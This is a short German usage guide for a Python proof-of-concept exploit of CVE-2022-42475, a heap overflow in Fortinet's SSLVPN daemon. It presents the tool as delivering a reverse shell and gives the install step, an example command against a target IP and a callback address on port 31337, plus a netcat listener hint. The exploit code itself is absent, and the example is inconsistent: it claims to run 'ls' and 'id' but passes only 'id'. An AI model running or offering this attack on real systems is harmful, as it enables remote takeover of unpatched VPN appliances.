
Python-Exploit für den Heap-Überlauf CVE-2022-42475 im Fortinet SSLVPN-Daemon. Liefert eine Reverse Shell über pwntools mit anpassbarem Ziel, Port und Befehlen.
POC-Code zur Ausnutzung des Heap-Overflows im SSLVPN-Daemon von Fortinet
pip install pwntools Um diesen Code zu verwenden, speichern Sie ihn in einer Datei, z. B. exploit.py, und führen Sie ihn dann mit Python in der Befehlszeile aus, wobei Sie die erforderlichen Argumente übergeben. Hier ist ein Beispielbefehl, um den Exploit auszuführen:
python exploit.py <target_host> <target_port> <reverse_ip>
Ersetzen Sie <target_host> durch den Hostnamen oder die IP-Adresse des Zielsystems, <target_port> durch die Portnummer des verwundbaren Dienstes und <reverse_ip> durch die IP-Adresse des Rechners, auf dem Sie eine Shell empfangen möchten. Die restlichen Argumente sind die Befehle, die ausgeführt werden sollen, getrennt durch Leerzeichen.
Wenn das Zielsystem beispielsweise die IP-Adresse 192.168.0.100 hat, der verwundbare Dienst auf Port 8080 läuft und Sie die Befehle ls und id ausführen möchten, führen Sie den folgenden Befehl aus:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
Dies stellt eine Reverse-Shell-Verbindung zu 192.168.0.101:31337 her und führt die Befehle ls und id auf dem Zielsystem aus. Beachten Sie, dass Sie einen Listener auf der angegebenen IP-Adresse und dem angegebenen Port benötigen, um die Reverse-Shell zu empfangen. Sie können Tools wie ncat oder netcat verwenden, um einen Listener zu erstellen.